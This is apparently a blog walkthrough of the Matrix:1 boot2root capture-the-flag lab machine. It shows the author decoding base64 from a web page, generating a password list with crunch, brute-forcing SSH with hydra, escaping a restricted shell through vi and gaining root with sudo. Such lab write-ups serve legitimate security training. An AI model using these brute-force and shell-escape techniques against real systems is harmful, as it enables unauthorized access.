CTF: Matrix:1 Walkthrough

      Nessun commento su CTF: Matrix:1 Walkthrough

Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve Matrix machine.

Description

Matrix is a medium level boot2root challenge. The OVA has been tested on both VMware and Virtual Box.

Difficulty: Intermediate

Flags: Your Goal is to get root and read /root/flag.txt

Networking: DHCP: Enabled IP Address: Automatically assigned

Hint: Follow your intuitions … and enumerate!

For any questions, feel free to contact me on Twitter: @unknowndevice64

Information gathering

TCP Scanning

Banner Grabbing

HTTP

Checking the source code of the  home page (Port 31337) we can find a string coded in base64

Decode base64 string

  • echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQ | base64 -d > decode.txt

Download Cypher.matrix

  • wget 192.168.1.148:31337/Cypher.matrix
The file that we had downloaded contains an esoteric language text (brainfuck) we can decode it using this website

Decoded text

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password

Fantastic we can access to the machine as a guest, but unfortunately, the password is not complete.

Crunch

We can use crunch to generate the passwords:

  • crunch 8 8 -t k1ll0r%@ -o passwords.txt

SSH brutefore

  • hydra -l guest -P passwords.txt ssh://192.168.1.148

Fantastic we found the correct password

Restricted shell

Unfortunately, we have a restricted shell, so the next step is to escape it 😛

  • vi [enter]
  • esc
  •  !/bin/bash
  • enter
  • export SHELL=/bin/bash:$SHELL
  • export PATH=/usr/bin:$PATH

Root

As you know the final step is to get a root permissions

  • sudo su
  • password: k1ll0r7n

Fantastic we have completed the Matrix machine.